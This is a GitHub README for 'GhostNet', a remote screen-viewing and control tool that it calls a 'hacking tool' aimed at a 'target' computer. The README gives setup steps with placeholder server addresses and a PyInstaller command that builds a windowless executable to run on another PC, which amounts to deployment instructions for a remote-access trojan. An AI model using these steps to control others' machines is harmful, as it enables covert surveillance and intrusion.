Skip to content

Quema100/GhostNet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

GhostNet

"GhostNet" is a program that allows remote control of a computer.
It transmits the target's screen, enabling remote control from a web page.

Installation

To install burgle, follow these simple steps:

  1. ⬇️ Download:

    1. Download file.
    2. Use Git
       git clone https://github.com/Quema100/GhostNet.git
  2. 📁 Install Moudules: npm (or pnpm) i with install python moudules. (Python Moudule List)

  3. ⚒️ Fix Server Address:

    • js:

       socket = new WebSocket('ws://your-server-address:${port}');
    • Python:

       server = websockets.serve(controller.handle_connection, "your-server-address", 8765)
  4. 🏃‍♀️ Start GhostNet:

    • start hacking tool:
      python ./src/GhostNet.py
    • start web server:
      npm (or pnpm) start

How to run this program on another PC

To run this program on another PC, follow these simple steps:

  1. Install: install pyinstaller

    • terminal
      pip install pyinstaller
  2. Build:

    • terminal
      pyinstaller -w -F -n=GhostNet ./src/GhostNet.py

Warning

This template is a tool developed strictly for educational and research purposes.
Improper use of this project may result in illegal outcomes, and the responsibility lies solely with the user.
The creator assumes no responsibility for any legal or ethical issues arising from the use of this template.

About

Remote Network Controller

Resources

Stars

Watchers

Forks

Packages

No packages published